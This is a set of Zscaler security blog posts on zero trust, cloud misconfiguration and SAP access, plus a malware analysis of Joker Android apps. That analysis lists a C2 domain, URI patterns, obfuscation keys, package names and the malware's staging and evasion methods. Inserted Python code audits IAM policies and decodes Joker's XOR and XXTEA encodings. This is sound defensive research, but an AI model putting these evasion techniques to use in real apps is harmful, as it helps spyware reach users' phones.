Intellectual property such as research results, manufacturing processes, formulae, and even patient details have become attractive targets for cybercriminals. Networking with third parties and remote work-from-home users due to the pandemic are putting security officers to the test. Thanks to the SASE framework and the zero trust security architecture, these worries can be relegated to the past.

Digital transformation has already reached the pharmaceutical sector. However, IT infrastructures at pharmaceutical companies, especially the network environments that are critical to business, are often not prepared for an increasing number of remote access requests from home offices. Virtual Private Networks (VPNs) are commonly used for this. The problem is that this technology, developed by Microsoft in the 90s, was not designed to manage an increasing number of remote access requests, which results in latency and creates security issues. For some time now, VPN has been losing its reputation for being invulnerable. For example, unpatched remote access VPN servers enable cybercriminals to easily access a company's network, meaning the same technology that is supposed to protect the network is vulnerable to attack. In addition, companies must strive to implement segmentation.

Juicy prey – the healthcare sector

This is a huge concern because cybercriminals are increasingly targeting the business side of the pharmaceutical industry, as clearly stated in the Zscaler study "2020 State of Encryption Report." The Zscaler cloud identified and prevented 6.6 billion threats between January 2020 and September 2020. The healthcare sector was in first place, with nearly 1.7 billion attacks discovered and prevented. A particularly precarious issue was that the attacks were hidden in SSL traffic, namely encrypted data traffic. In total, the number of SSL-based attacks in the period researched increased by 260 percent, according to another conclusion of the study.
The fact that the healthcare sector is particularly attractive to cybercriminals is no surprise. Besides new work strategies with home office regulations and bring your own device (BYOD) policies, obsolete and inadequate security mechanisms in system environments — combined with the increasingly perfidious methods of data thieves — continue to cause anxiety for IT security officers. In addition, cooperation between third parties — universities, partners, or suppliers — which is typical within the pharmaceutical industry, results in them having full access to parts of the network. These over-privileged users create a major risk, as the monitoring of devices and guidelines occurs outside the area of control of the IT administrator. In practical terms, IT officers lack oversight of the access rights of external users to individual applications and services. For this reason, the attack surface area is exponentially larger.

Ultimately, the ever-present trend of mergers and acquisitions in this industry means that network structures and their security measures are often not up to current technology standards - independent of the fact that the integration of various IT topologies can take months or even years. M&As bring about increased security risk — already established infrastructures need to be dismantled and reintegrated within the context of merging organisations and configuring a new network. In addition, there is the typical problem of what is known as shadow IT, which exists alongside the official IT infrastructure and without the knowledge of the IT department. Read more about this in a recent blog to find out how Zscaler can help you to accelerate M&A processes.

SASE and zero trust: a safe haven for the pharmaceutical sector

For pharmaceutical companies, the Gartner Model SASE (Secure Access Service Edge) and ZTNA (Zero Trust Network Access) are a safe haven from these challenges — moving employee security and connectivity to the cloud.
Simultaneously, productivity will increase, because employees can avoid the detour through a VPN and the server centre and use innovative solutions such as Microsoft 365 in an effective and secure manner. Zscaler’s ZTNA solutions make it possible to uncouple application access from network access, segment individual user access to the application, and provide both remote access to server centres and applications in hybrid and multicloud environments. In other words, the merging of networks can be considered something of the past, because zero trust eliminates the need to place users on the network. Employees, as well as third-party companies and contractors, are only given secure, granular, and exclusive access to the specific applications.

Therefore, instead of relying on physical or virtual appliances, Zscaler Private Access (ZPA) enables the use of a cloud-based solution. Based on a set of defined policies, the Zscaler Zero Trust Exchange seamlessly connects various users to specific applications by using inside-out connections. This results in fast and high-performance user connectivity to business-critical applications and continuous security for sensitive data. This enables companies to kill several birds with one stone: set up professional defence mechanisms to fend off cybercriminals, while employees and external users can access the information they need using a protected corridor. Moreover, mergers and acquisitions aren’t automatically stressful to IT officers.

Wed, 21 Jul 2021 09:14:39 -0700 Kevin Schwarz

Prevent Cloud Security Breaches Attributable to Cloud Misconfigurations with CSPM

Public cloud adoption enables enterprises across all sectors to collaborate more efficiently, especially in today’s highly remote business environment. The cloud offers many advantages: faster deployments, increased agility and resilience, lower risk, auto-scalability, and cost-effectiveness for enterprises of all sizes.
The use of public clouds is growing, and so are the attacks targeting them. But that doesn’t mean public clouds are risky or that organizations should stay away from them. While even public cloud infrastructure is now far more secure, data in the cloud is still vulnerable due to a significant challenge: misconfiguration. High-profile data breach incidents have shown that most successful cyberattacks on public cloud instances are caused by misconfigurations rather than vulnerabilities. Therefore, adequately configuring systems is critical for reducing the chance of a breach.

Why misconfiguration is the top cloud vulnerability

Cloud providers are continuously introducing new features and functionalities to their services, which is exciting and promising. At the same time, however, these changes add complexities to cloud environments that make it harder to protect against misconfigurations and compliance risks and keep data secure. While CSPs often provide tools to help manage cloud configuration, misconfiguration of cloud resources remains the most prevalent cloud vulnerability that bad actors can exploit to access cloud data and services. Often arising from cloud service policy mistakes or a misunderstanding of shared responsibility, misconfiguration has an impact that varies from denial-of-service susceptibility to account compromise.

The impact of cloud misconfigurations

Misconfigurations create entry points for hackers. It can take only a few minutes for a system to be compromised. However, many organizations still take days, months, or longer to realize that an intruder has accessed their data, and only then do they start taking corrective action. Cloud misconfiguration errors related to public access to storage buckets, account permissions, password storage and management, unencrypted data stores, etc., have led to numerous data breaches and the exposure of billions of records.
Victims included high-profile companies such as Capital One, Facebook, Ford, and Netflix. There are countless examples of cloud misconfiguration–related data breaches, but one worth mentioning occurred in 2018 when FedEx unknowingly exposed thousands of scanned documents due to the company’s failure to secure an Amazon Web Services (AWS) cloud storage server. The breached documents included passports, drivers’ licenses, and applications for delivery of mail forms that contained customers’ names, home addresses, phone numbers, and zip codes.

The causes of cloud misconfiguration that can lead to data breaches

According to Gartner, nearly all successful attacks on cloud services result from customer misconfiguration, mismanagement, and mistakes. As more organizations store data in the cloud, cases of cloud configuration errors are bound to increase. Cloud misconfiguration is most frequently caused by:

Lack of understanding of the shared responsibility model: Cloud security and compliance are shared responsibilities between the cloud service provider (CSP) and the customer. The CSPs provide the security “of” the cloud service and infrastructure, and the security “in” the cloud service is the customer’s responsibility. In all cases, it is the enterprise’s responsibility to ensure that its data is adequately protected. CSPs are responsible for detecting threats, updating, patching, and incident response to the cloud infrastructure. The enterprises are responsible for detecting, responding to, updating, and patching their cloud assets and resources. Understanding the shared responsibility model and the proper configuration of the account can help enterprises align and implement compliance and security policies as per their industry domain.

Lack of visibility and control: If you can’t see the data in the public cloud, you can’t secure it. It is essential to accurately discover and track assets and inventory with complete context, configuration status, and weak spots.
Potential risk areas include databases with ports open to the public internet that could allow attackers to access cloud storage services set to public. While it might take some time and effort for the IT and security teams to have visibility into all assets and resources, it is necessary for securing the platform.

Poor access and permission management: Access management is one of the most common security risks. Incorrect access management configuration often leads to over-privileged users gaining access to sensitive data. Extensive access permissions for IAM users, groups, and cloud services are a risky practice. If such credentials get compromised, cybercriminals may access any services and data, expose assets, and compromise data. In a notable example, poor access management at Uber leaked the personally identifiable information (PII) of 57 million users.

Misconfigurations in network security groups: Misconfigured network security groups allow attackers to abuse the exposed services and ports to make their way into the cloud-based systems through a brute-force attack or by exploiting known vulnerabilities. It is the second most widely reported security risk after storage bucket misconfiguration.

Human errors: Human error is the most common cause of misconfiguration due to complex and multiple levels of configuration. In the absence of automation, cloud workloads and cloud security services are manually configured, increasing the chance of human error. Relying on a CSP’s default configurations can also cause problems and lead to increased security risk.

Lack of adherence to compliance regulations and controls: Compliance with standards such as PCI-DSS or SOC communicates an organization’s commitment to doing business the right way and aligning with globally accepted security benchmarks. In many cases, companies may achieve compliance once but find it challenging to maintain in the long run, which can lead to financial loss and damage to the company’s reputation.
Lack of encryption: The “Public mode” setting on databases, shared storage, and other cloud provider services is a significant cause of data breaches. It allows cybercriminals to automate their searches for weak security points. The most common misconfigurations still revolve around cloud storage buckets and the objects that are not encrypted, which pose a significant confidentiality risk and make them the number-one target for data breaches.

CI/CD pipelines: With the rapid-release cycles employed by development and DevOps teams, the security and risk management teams struggle to keep up with the changes and gain control over these deployments. The CI/CD pipeline can contain vulnerabilities that have the potential to compromise all systems. Most vulnerabilities relate to configuration or management. A significant portion of security and risk concerns can be addressed during the design and development phase.

Log monitoring disabled: Security incidents and event logs are critical to determine security failures. In case of a compromise, logs are often the first source of information. CSP tools, such as AWS CloudTrail and Azure Monitor, can help ensure that you have security incident event logs. But they only work when enabled.

Delayed incident response: Serious misconfigurations often go undetected for days or weeks, and it can be very challenging to secure cloud services and applications. Compared to periodic assessments, real-time alerts and notifications help enterprises identify incidents proactively, so they can measure and mitigate violations and risks to critical infrastructure, systems, and data on an ongoing basis.

How can you prevent cloud misconfigurations?

Now that you have a better idea of the common causes of cloud misconfiguration that can lead to security breaches, here are some tips that can help you avoid them.

Gain visibility and control

Know your cloud environments and define a security foundation.
Continuously monitor cloud assets and resources for current configuration status.

Audit access and permission

Review access controls to ensure only authorized users can act. Ensure the IAM policies are correctly implemented, such as bucket policies on storage accounts inside of CSPs. Enforce the principle of least privilege by only giving users the permissions they need to do their jobs. Consider setting up multifactor authentication for credentials to provide an extra layer of security. Rotate access keys periodically.

Log monitoring

Implement logging, which can identify changes to cloud environments and help determine the cause and extent of misconfiguration incidents. A dedicated team should monitor logs regularly, as they are a crucial part of incident response.

Enable encryption and backup

Conduct frequent assessments and audits of storage bucket configuration settings and access policies. Encryption, uniform access, and backup of the contents within storage buckets will help to minimize the damage if an incident occurs.

Automate incident response, policy enforcement, and remediation

Automation eliminates human error and delays caused by workforce bottlenecks. Configure custom/automated alerts and notifications that promptly notify cloud admins and users about misconfigurations with robust remediation. Enforce compliance standards with the right tools and processes that can help organizations benchmark against multiple compliance frameworks, such as PCI DSS for retail and HIPAA for healthcare, and established best security practices with the help of cloud-specific benchmarks like those from the Center for Internet Security (CIS).

Embrace a culture of security and DevOps

Define and integrate strong security policies into all processes used to build or enhance cloud infrastructure. According to Gartner, 99 percent of cloud security issues over the next several years will be the fault of customers, not cloud services.
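The access and permission audit described above can be expressed as mechanical checks over policy documents. The Python below is an added example, not Zscaler’s CSPM product; it flags the three misconfigurations the post names most often (a public principal with no condition, a wildcard action, and a wildcard action over every resource) in IAM-style JSON. The bucket name, account id and policies are constructed for the example.

```python
import json


def _as_list(value):
    """IAM JSON allows a string or a list in Action/Resource/Principal; normalise."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _principal_is_public(principal):
    """'*' or {"AWS": "*"} both grant access to everyone, including anonymous callers."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS"))
    return False


def find_policy_findings(policy: dict) -> list:
    """Return (finding, statement id) pairs for risky Allow statements.

    PUBLIC_PRINCIPAL  - anyone may call, and no Condition narrows it (public bucket)
    WILDCARD_ACTION   - "*" or "<service>:*" granted (over-privileged identity)
    WILDCARD_RESOURCE - a wildcard action granted on every resource
    Deny statements only restrict access, so they are never reported.
    """
    findings = []
    for idx, stmt in enumerate(_as_list(policy.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue
        sid = stmt.get("Sid", "statement-%d" % idx)
        actions = _as_list(stmt.get("Action"))
        resources = _as_list(stmt.get("Resource"))
        if _principal_is_public(stmt.get("Principal")) and not stmt.get("Condition"):
            findings.append(("PUBLIC_PRINCIPAL", sid))
        wildcard_action = any(a == "*" or a.endswith(":*") for a in actions)
        if wildcard_action:
            findings.append(("WILDCARD_ACTION", sid))
        if wildcard_action and "*" in resources:
            findings.append(("WILDCARD_RESOURCE", sid))
    return findings


def audit(policies: dict) -> dict:
    """Run the checks over a {name: policy JSON text} mapping, as a posture scan would."""
    return {name: find_policy_findings(json.loads(doc)) for name, doc in policies.items()}


# Constructed sample policies (not from any real account).
WEAK_BUCKET_POLICY = """{"Version": "2012-10-17", "Statement": [
  {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
   "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"}]}"""

OVERPRIVILEGED_IAM_POLICY = """{"Version": "2012-10-17", "Statement": [
  {"Sid": "AllOfS3", "Effect": "Allow", "Action": "s3:*", "Resource": "*"}]}"""

# Hardened form: a named role, one action, one bucket, plus a Deny for non-TLS access.
HARDENED_BUCKET_POLICY = """{"Version": "2012-10-17", "Statement": [
  {"Sid": "AppRead", "Effect": "Allow",
   "Principal": {"AWS": "arn:aws:iam::111122223333:role/app-reader"},
   "Action": ["s3:GetObject"], "Resource": "arn:aws:s3:::example-bucket/*"},
  {"Sid": "DenyInsecure", "Effect": "Deny", "Principal": "*", "Action": "s3:*",
   "Resource": "*", "Condition": {"Bool": {"aws:SecureTransport": "false"}}}]}"""

SAMPLE_POLICIES = {
    "weak-bucket": WEAK_BUCKET_POLICY,
    "over-privileged-user": OVERPRIVILEGED_IAM_POLICY,
    "hardened-bucket": HARDENED_BUCKET_POLICY,
}
```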
Cybercriminals are constantly inventing new ways to penetrate the defenses of modern enterprises. Security controls such as Zscaler CSPM offer you the best chance of preventing, detecting, and remediating potential breaches due to misconfiguration and staying compliant. Want to hear more about Zscaler Cloud Security Posture Management? Get in touch with us today.

Additional reading:
What is Cloud Security Posture Management
White paper: Overcome the Top Five Data Protection Challenges in a Cloud-First World
Zscaler CSPM At a Glance (PDF)

Tue, 20 Jul 2021 08:00:01 -0700 Mahesh Nawale

SAP and ZPA: A Match Made in Digital Transformation Heaven

Zscaler is thrilled to team up with SAP to increase global user accessibility to critical business applications while stamping out ransomware attacks and other threats. With the rise of digital transformation initiatives, application owners are moving apps critical to operational and payment functions, such as SAP, to the cloud in order to ensure effective scalability. But, to maximize the value of these cloud investments, achieve business continuity in the event of the unknown (COVID-19, for example), and support a new hybrid work model in the post-COVID world, employees, partners, and customers must be able to securely access SAP and other business apps from anywhere and on any device, and without adding risk to the business. Let’s take a look at the issues in detail.

Six challenges IT and application owners must overcome

Providing controlled access to SAP instances running in the data center or being migrated to the cloud is a challenge with legacy technology, which involves multiple point products. This leads to more complexity, cost, and friction, reducing ROI from cloud initiatives.
Employees, contractors, and partners are constantly on the move and working from a variety of locations and devices.
Business continuity requires access to services with an unprecedented level of flexibility that is simply not possible with legacy solutions.
The attack surface has expanded due to user mobility and the use of VPNs that extend the network out to the user, increase risk, and allow lateral movement across the environment.
Traditional access services hinder user productivity by introducing latency from backhauling traffic to the data center, leading to user complaints, frustration, and less motivation.
Lack of insight into user-to-app experience leads to blind spots and makes it difficult to find and fix performance issues.
Traditional services are limited to the capacity of appliances and struggle to scale in a cost-effective manner as more remote workers are hired.

Hackers are exploiting these new vulnerabilities when proper security is not deployed. In fact, findings from a joint report by SAP and Onapsis on cyber activity from mid-2020 to March 2021 reveal:

Over 300 exploits targeting SAP systems were successful.
Attackers attempted to access SAP systems to modify configurations and users and exfiltrate business information.
The earliest cyberattack was recorded within 72 hours after SAP released patches.
A targeted cyberattack could compromise an account within 90 minutes.
In one case, threat actors knew of the existing SAP security vulnerability before public disclosure and the release of proof-of-concept (PoC) code.

Power your secure remote access and cloud transformation needs with Zscaler

Zscaler Private Access (ZPA) is a cloud-delivered service from Zscaler that provides seamless, zero trust access to private applications, such as SAP, running on a public cloud or within the data center. With ZPA connectivity, SAP is never exposed to the internet, making it completely invisible to unauthorized users. ZPA enables SAP to connect to users via inside-out connectivity versus extending the corporate network to them via a VPN or VDI service.
Users are never placed on the network. This zero trust network access (ZTNA) approach supports both managed and unmanaged devices and any private application (not just web apps). The result is better security, better visibility, and greater regulatory compliance.

Companies like Growmark are already benefiting from ZPA’s ability to increase security and improve user access and experiences, even while users roam on poor-quality rural connections. Eric Fisher, the IT Director at Growmark, noted: “We’re getting a better security footprint, better visibility and we’re more compliant.”

Indeed, the benefits of leveraging Zscaler Private Access for SAP are multifaceted:

Enable business continuity and hybrid-remote work: Empower the whole ecosystem of employees, partners, and customers to access all business apps (SaaS, or private apps in the data center or public cloud) from any device, from any location, on any network.
Embrace zero trust within your business: The Zscaler Zero Trust Exchange enforces business policies that follow the user and adapt based on changes in context, keeping users off-network and providing identical cyber threat and data protection everywhere. The Zscaler Zero Trust Exchange integrates with identity providers like Okta, Azure AD, and Ping conditional access, as well as endpoint security providers (CrowdStrike, Microsoft, and Carbon Black) to adapt policies based on context.
Leverage Zscaler’s globally distributed secure access service edge: Over 150 global cloud edge locations provide faster access and higher user productivity.
Monitor digital experience: Zscaler ZDX monitoring provides visibility all the way from the user endpoint to the application, and proactively resolves user experience issues in any location around the world, in just minutes. The 100% cloud-native service scales cost-effectively to better meet business needs.
ZPA and SAP can be configured in just minutes

In fact, securing access to SAP can be done in three easy steps:

Install the ZPA App Connector next to SAP, on-premises or in the cloud.
Deploy the lightweight ZPA Client Connector software on user workstations.
Get a single point of management for policies and more.

Certified for Secure Remote Access to SAP

In addition, a topic that is top of mind for CIOs and CISOs today is how to protect business-critical applications during a cloud migration process, while providing uninterrupted, global remote access. Most enterprises today are migrating SAP ECC (ERP Central Components) to S/4HANA. S/4HANA allows customers to choose from a broad range of “4+1” cloud infrastructure providers, including AWS, Azure, GCP, Alibaba, and SAP’s own HANA Enterprise Cloud. Migrating an ERP platform that touches every part of your business, customers, and suppliers without disruption is a complex undertaking. Zscaler Private Access simplifies and speeds up migrations by reducing the networking complexities typically encountered when moving users from an on-premises application into a cloud-hosted environment. Once end users are configured to use the ZPA Client Connector, administrators are freed up to focus on back-end migration tasks. Moreover, users can be terminated from one back-end and connected to another with a simple policy update in the ZPA administration console. The result is simpler SAP migrations that can be completed in less time.

Simplified Migration to S/4HANA Enterprise Cloud

Zscaler is an SAP PartnerEdge Build Partner and is proud to announce that ZPA is listed as a supported product on SAP’s 2021 HANA Enterprise Cloud Advanced Edition Roles and Responsibilities document. This gives customers confidence, knowing that ZPA has passed SAP’s rigorous processes for determining interoperability with SAP applications. And the benefits don’t stop here.
ZPA for SAP is just one example of how the Zscaler Zero Trust Exchange can enhance security, improve user experiences, and leverage policy to easily streamline application access and cloud migration. For more information on Zscaler solutions for SAP, please visit Zscaler ZPA for SAP.

Thu, 22 Jul 2021 08:00:01 -0700 Nicole Bucala

Joker Joking in Google Play

Joker is one of the most prominent malware families targeting Android devices. Despite public awareness of this particular malware, it keeps finding its way into Google’s official application market by employing changes in its code, execution methods, or payload-retrieving techniques. This spyware is designed to steal SMS messages, contact lists, and device information, and to sign the victim up for premium wireless application protocol (WAP) services.

Zscaler’s ThreatLabz research team has been constantly monitoring the Joker malware. Recently, we observed regular uploads of it onto the Google Play store. ThreatLabz notified the Google Android Security team, who have taken prompt action to remove the suspicious apps (listed below) from the Google Play store. This prompted us to evaluate how Joker is so successful at getting around the Google Play vetting process. We saw 11 different samples regularly uploaded to Google Play recently, clocking 30k installs. The following are the names of the infected apps we discovered on the Google Play store:

Free Affluent Message
PDF Photo Scanner
delux Keyboard
Comply QR Scanner
PDF Converter Scanner
Font Style Keyboard
Translate Free
Saying Message
Private Message
Read Scanner
Print Scanner

Targeted Categories:

Joker malware authors have targeted some categories of apps more than others.
Based on the 50+ payloads we have seen in the last 2.5 months, we have found the following 5 categories being targeted the most heavily:

Health & Fitness
Photography
Tools
Personalization
Communication

The “Tools” category has been the favorite target of the Joker malware author, accounting for 41% of the total payloads we have seen. “Communication” and “Personalization” are the next most affected categories with 28% and 22% of payload uploads respectively. The “Photography” category saw 7% of payloads. “Health & Fitness” made up the final 2% of payloads; we believe this category is a new addition as we have not seen this category targeted previously.

Publisher Names:

Joker authors appear to use a name dictionary system to derive the publisher names for their malicious apps. All the Joker dropper malware have used full (first and last) names for developers, as shown below. Each developer has only one app registered to them as well. Such information serves as indicators to help us identify potential Joker malware -- though these criteria can certainly apply to legitimate apps as well.

New Tactics From Joker Malware Authors:

Joker is well known for changing its tactics to bypass the Google Play store vetting process. This time we saw Joker using URL shortener services to retrieve the first level of payload. Unlike the previous campaign where the payloads were retrieved from the Alibaba Cloud, in this campaign we saw the Joker-infected apps download the mediator payload via URL shortener services such as TinyURL and others, to hide the known cloud service URLs serving stage payloads.

Fig 1: URL shortener service TinyURL
Fig 2: URL shortener service
Example execution flow:

C2 Changes:

From the previous encounter, we also observed updated command and control (C2) URIs. In the previous campaign, we saw the C&C URI pattern was “/k3z0/B9MO/”, which changed in the newer payload to “/svhyqj/mjcxzy”.
Fig 3: Old C2 communication
Fig 4: New C2 communication

String Obfuscation Key Changes:

In the previous campaign, we saw the end payload use the string “nus106ba” to obfuscate the important information. It has been changed to “nus35ba”, which can be observed in the below screenshot. We have also observed that the string which obfuscates sensitive strings such as C2 addresses keeps changing with the format “nus*ba” (where * represents a 2 or 3 digit number).

Fig 5: String Obfuscation examples
Fig 6: String Obfuscation examples

Abusing The Notification Access:

In this campaign, the Joker malware payloads abuse the notification access functionality. Once installed, the malware prompts the user for notification access, as shown in the below screenshot. Notification access grants permission to read potentially all notifications posted by the device and any other installed applications. Once these settings have been allowed by the user, the malware has the control it needs to carry out its malicious activities.

Fig 7: Notification Access

Following is the code routine for Notification access by the stager payload.

Fig 8: Code Routine for Notification Access Abuse

Following is the code routine for Notification access by the final payload.

Fig 9: Code Routine for Notification Access Abuse

New Variant Or Smart New Stage Payload?

In analyzing the Joker campaign from the past two months, we came across two instances of what we consider to be the newest variant, which has substantial differences. The app Font Style Keyboard is found to incorporate new changes from the older payloads. In this Joker downloader app, we observed that the URL shortening service was leveraged to download the stage 1 payload.

Fig 10: Stage 1 Payload delivery URL

The Google Play store app connects to the URL shortener service, which then responds with the URL to download the stage 1 payload.
Fig 11: Stage 1 download from Google Play Store app

Like the normal Joker campaign, this stage 1 payload has an embedded URL to download the next stage payload or the final stage payload. In this piece of malware, we saw the end payload was retrieved from the stage 1 payload as shown below.

Fig 12: Embedded second-stage payload.
Fig 13: Download of a second-stage payload.

From this point on, this variant deviates quite a bit from the normal routine of the Joker campaign. In the previous Joker campaigns (or even the recent examples shown at the start of the writeup), the embedded URL in stage one was directly serving the Dalvik executables which are loaded by the stage one payload for further execution. In the new variant, the embedded URLs now serve raw data which is later converted to the next stage payload via an XOR operation with a hardcoded key, as shown in the below figure.

Fig 14: XORed with hardcoded key

Along with the XORed stage payload, another change to the stage binaries is that now the Joker stage payload also checks to see if specific apps are installed on the infected devices. Observe below.

Fig 15: Checks for the installed apps

The following are the apps that the stage payload checks for. These are also available on the Google Play store. The stage payload will only continue certain activities if any of the above apps are not installed on the infected devices. From the listed app categories and developer names we assume that these are again Joker-related apps that can be used to assess the infected devices. However, by the time of writing this, two of these apps have been taken down by the Google Play store and the rest are not working in our environment, so we cannot confirm that these are Joker malware.

Unlike the previous Joker campaigns, the stage payload is also doing command and control communication. The below screenshot exhibits the activity from the staged payload.
In the normal routine, we did not observe any network activity from the staged payload apart from straightforward downloads of the next stage payload. In this sample, we have found the staged payload connects to the gaikai[.]work domain by sending device information and receiving commands from the server.

Fig 16: C2 from stage payload

Along with this, we are also observing that the stage payload uses an XXTEA algorithm to encrypt the data being served to and by the C2 server. Below is the code routine for encryption and decryption of data with the hard-coded key.

Fig 17: XXTEA encode and decode

We believe the stage payload C2 activity is mainly used to screen the infected mobile phones that meet the trigger condition. The C2 server can issue an error_code field with a return value, on which the malware acts to trigger certain malicious activities, including SMS operations.

Fig 18: XXTEA decode

In the normal Joker infection cycle the intermediate payloads directly drop the final stage payload, whereas in this smart stage payload, we saw the final stage payload will only be downloaded if the infected device has a Thailand mobile SIM card. Observe the below screenshot.

Fig 19: Final stage download.

Conclusion:

The Joker malware authors are very active and innovating on their tactics in their attempts to bypass the vetting process of the Google Play store. Judging by the number of payloads uploaded to Google Play, we can safely say that the Joker malware authors are succeeding in their efforts. At ThreatLabz, we constantly monitor the newly added apps to the Google Play store for such incidents and help remove them from the Google Play store by collaborating with the Google Security Team. The Google Play store is not the only place that Joker malware can be found. These same apps are uploaded to other third-party app stores as well due to those stores’ regular crawling activities on the Google Play store.
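An analyst reproducing the two encodings described in this write-up (the XOR-packed stage payload and the XXTEA-wrapped C2 traffic) needs a decoder for each. The Python below is an added example, not the malware’s code and not from the original post: it unpacks a repeating-key XOR blob and checks for the Dalvik header, and it implements XXTEA decryption for captured C2 data. The 16-byte key, the length-word framing, the 3-byte XOR key and the JSON reply are constructed placeholders, since the post does not publish the real key or message format.

```python
import json
import struct

DELTA = 0x9E3779B9
MASK = 0xFFFFFFFF
DEX_MAGIC = b"dex\n"  # first bytes of a Dalvik executable ("dex\n035\0" etc.)

# Constructed placeholders: the post does not publish the real keys.
STAGE_XOR_KEY = b"\x5a\xa5\x3c"
C2_KEY = b"0123456789abcdef"  # XXTEA keys are exactly 128 bits
WRONG_KEY = b"fedcba9876543210"


def xor_unpack(blob: bytes, key: bytes) -> bytes:
    """Undo a repeating-key XOR; the same call packs and unpacks."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(blob))


def looks_like_dex(data: bytes) -> bool:
    """Sanity check that an unpacked stage really is a Dalvik executable."""
    return data[:4] == DEX_MAGIC


def _mx(sum_, y, z, p, e, k):
    """XXTEA mixing term, truncated to 32 bits like the C reference."""
    return ((((z >> 5) ^ (y << 2)) + ((y >> 3) ^ (z << 4)))
            ^ ((sum_ ^ y) + (k[(p & 3) ^ e] ^ z))) & MASK


def _key_words(key: bytes):
    if len(key) != 16:
        raise ValueError("XXTEA key must be exactly 16 bytes")
    return struct.unpack("<4I", key)


def xxtea_encrypt(data: bytes, key: bytes) -> bytes:
    """XXTEA over little-endian words. Framing (assumed for this example):
    a 4-byte length word, then data zero-padded to >= 2 whole words."""
    k = _key_words(key)
    padded = struct.pack("<I", len(data)) + data
    padded += b"\0" * ((-len(padded)) % 4)
    padded += b"\0" * max(0, 8 - len(padded))
    v = list(struct.unpack("<%dI" % (len(padded) // 4), padded))
    n = len(v)
    sum_, z = 0, v[-1]
    for _ in range(6 + 52 // n):
        sum_ = (sum_ + DELTA) & MASK
        e = (sum_ >> 2) & 3
        for p in range(n - 1):
            y = v[p + 1]
            v[p] = (v[p] + _mx(sum_, y, z, p, e, k)) & MASK
            z = v[p]
        y = v[0]
        v[n - 1] = (v[n - 1] + _mx(sum_, y, z, n - 1, e, k)) & MASK
        z = v[n - 1]
    return struct.pack("<%dI" % n, *v)


def xxtea_decrypt(blob: bytes, key: bytes) -> bytes:
    """Inverse of xxtea_encrypt. An impossible length word after decryption
    is the usual symptom of a wrong key, so it is reported as ValueError."""
    k = _key_words(key)
    if len(blob) < 8 or len(blob) % 4:
        raise ValueError("ciphertext must be >= 8 bytes and a multiple of 4")
    v = list(struct.unpack("<%dI" % (len(blob) // 4), blob))
    n = len(v)
    rounds = 6 + 52 // n
    sum_, y = (rounds * DELTA) & MASK, v[0]
    for _ in range(rounds):
        e = (sum_ >> 2) & 3
        for p in range(n - 1, 0, -1):
            z = v[p - 1]
            v[p] = (v[p] - _mx(sum_, y, z, p, e, k)) & MASK
            y = v[p]
        z = v[n - 1]
        v[0] = (v[0] - _mx(sum_, y, z, 0, e, k)) & MASK
        y = v[0]
        sum_ = (sum_ - DELTA) & MASK
    plain = struct.pack("<%dI" % n, *v)
    (length,) = struct.unpack("<I", plain[:4])
    if length > len(plain) - 4:
        raise ValueError("bad length word: wrong key or corrupted data")
    return plain[4:4 + length]


def xxtea_decrypt_or_none(blob: bytes, key: bytes):
    """Convenience wrapper for trying candidate keys against captured data."""
    try:
        return xxtea_decrypt(blob, key)
    except ValueError:
        return None


def c2_error_code(blob: bytes, key: bytes):
    """Decrypt a C2 reply and read the error_code field the post describes.
    A JSON body is an assumption made for this example."""
    return json.loads(xxtea_decrypt(blob, key).decode("utf-8")).get("error_code")


# Constructed samples: a packed DEX header and an encrypted C2 reply.
PACKED_STAGE = xor_unpack(b"dex\n035\0" + b"\0" * 8, STAGE_XOR_KEY)
SAMPLE_REPLY = b'{"error_code": 0, "msg": "ok"}'
SAMPLE_REPLY_ENC = xxtea_encrypt(SAMPLE_REPLY, C2_KEY)
```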
Malicious apps have been promptly removed from the Play store upon being reported by the security community or caught by their vetting process, but these apps can live longer in the third-party app stores who do not perform these same actions. Hence, we still recommend using the Google Play store for downloading any mobile app.

Package Names:

com.affluent.messenger - Free Affluent Message
PDF Photo Scanner
com.delux.Keyboard - delux Keyboard
com.comply.qrscan - Comply QR Scanner
com.converter.pdfscanner - PDF Converter Scanner
r4d236dTy.rc5a682Ty.r7a6011Ty - Font Style Keyboard
com.text.translate.freegp - Translate Free
say.freetext - Saying Message
messenger.message.private - Private Message
com.totalcomapp.barcodereader - Read Scanner
com.scanner.sad.msgf.wq - Print Scanner

Tue, 20 Jul 2021 10:02:26 -0700 Viral Gandhi

Stop Unnecessary “APPification” of Your Core Systems

This post also appeared on LinkedIn.

Enterprises are embracing mobile and cloud technology benefits in order to foster company-wide digital transformation. But with this movement comes a new set of issues: how do you cost-effectively push core business processes and applications to a mobile and remote workforce without compromising security?
CIOs at banking, financial services, and insurance (BFSI) companies increasingly manage large projects that extend primary business functions such as core banking systems (CBS) and insurance policy admin systems (PAS) to mobile workers through app extensions. The “APPification” of these core banking functions aims to provide field employees with a simple, speedy, and secure method of helping customers make decisions and engage in services remotely. But do they? Already-taxed dev teams must now create, manage, and maintain multiple systems instead of just one. Is the APPification of core services helping or hindering business objectives?

Users need mobile access

Most banks and insurers have employees in the field selling retail products such as loans, credit cards, and insurance policies to new customers, or assisting current customers with new product options or opportunities. To provide and collect the best information for quotes, policies, coverage details, terms and conditions, and other data, field staff need access to core banking and insurance systems.

Establishing and maintaining secure remote connections to core business applications is a major headache for enterprise security teams: remote connections not only require extra security infrastructure, but also require that employees follow the security policies. Virtual private networks (VPNs) are one option. But VPNs require user traffic to cross a stack of appliances such as load balancers, DDoS protection, firewalls, and VPN concentrators—each adding latency to the transaction. Field reps, seeking faster connectivity, could “go rogue” and bypass VPN controls, which could open the corporate network to bad actors.

One solution to the remote access challenge is creating mobile apps for loan origination and policy quote engines, packaging them inside a mobile device manager (MDM) container, and using real-time web services or APIs that connect to core systems. But “APPification” creates new headaches for IT leads.
Apps: tighter security, but higher price

While appification may solve immediate end-user access problems, using mobile apps to extend existing CBS or PAS services can lead to complications:

Increased development overhead: Creating a set of mobile apps, often for both the Android and iOS platforms, can be taxing for development teams. Ensuring compatibility and service quality across different OS versions, device screen sizes, and new mobile device models can be a nightmare for your dev teams.

Frequent change requests: New workflows must be designed, maintained, tested, and rolled out for processing app change requests.

